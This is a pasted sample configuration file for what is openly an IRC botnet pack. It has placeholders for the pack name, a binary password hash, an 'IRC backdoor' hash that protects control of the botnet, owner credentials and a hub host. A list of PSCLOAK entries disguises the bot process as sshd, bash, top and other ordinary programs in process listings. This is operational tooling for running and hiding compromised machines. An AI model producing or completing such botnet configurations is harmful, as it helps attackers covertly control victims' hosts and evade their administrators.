pack.cfg.sample 1.8 KB

1234567891011121314151617181920212223242526272829303132333435363738394041424344454647484950515253545556575859606162636465
  1. /* The < && > indicates the area you must change!
  2. * Do not leave the <>
  3. */
  4. /* PACKNAME: name of the pack */
  5. PACKNAME <name>
  6. /* SHELLHASH: 32 char md5 hash used for binary password
  7. * in mIRC: //echo -a $md5(SOMEWORD)
  8. * URL: http://edge.codebin.dk/md5.php
  9. */
  10. SHELLHASH <md5hash>
  11. /* BDHASH: 32 char MD5 hash used for IRC backdoor
  12. * This must remain 100% secure/private, this key can retrieve the salts, and
  13. * the entire botnet could be hijacked, a pass 8 chars or more is suggested */
  14. # NOTE: Botlink uses this for linking, if it is changed on a bot, it wont link to another bot unless
  15. # the other bot has the same bdhash. (Protects your botnet, trust me)
  16. BDHASH <md5hash>
  17. /* DCCPREFIX: 1 char cmd prefix for dcc. (ie, .cmd or !cmd) */
  18. DCCPREFIX <.>
  19. /* The settings below can each be defined multiple times */
  20. /* OWNER <nick password host>
  21. * Multiple OWNER lines may be defined, each will be added as a +a perm owner.
  22. * nick: nickname what else?
  23. * password: initial password for user
  24. * host: hosts of the user (list as many as needed)
  25. */
  26. OWNER <Bob S0m3P4ass *!bob@1.2.3.4 *!*@1.2.3.4>
  27. /* OWNEREMAIL: email addresses that status/errors will be sent to when needed
  28. * list as many as needed
  29. */
  30. OWNEREMAIL <some@email.com>
  31. /* HUB <nick host port host>
  32. * Hubs are ranked by the order they are listed (previously was hublevel in settings.c)
  33. * nick: nick of hub
  34. * host: hostname or ip of hub
  35. * port: port the hub listens on
  36. * ident: ident of the hub (list as many as needed)
  37. */
  38. HUB <God god.net 666 god ~God>
  39. /* PSCLOAK <name>
  40. * name: the name of the program to spoof as in 'ps'
  41. * list as many as needed
  42. * A default list is provided
  43. */
  44. PSCLOAK -bash
  45. PSCLOAK ftp
  46. PSCLOAK /usr/sbin/sshd
  47. PSCLOAK man
  48. PSCLOAK pine
  49. PSCLOAK bash
  50. PSCLOAK top
  51. PSCLOAK last
  52. PSCLOAK w
  53. PSCLOAK ps ux
  54. PSCLOAK bash
  55. PSCLOAK ./psybnc
  56. PSCLOAK BitchX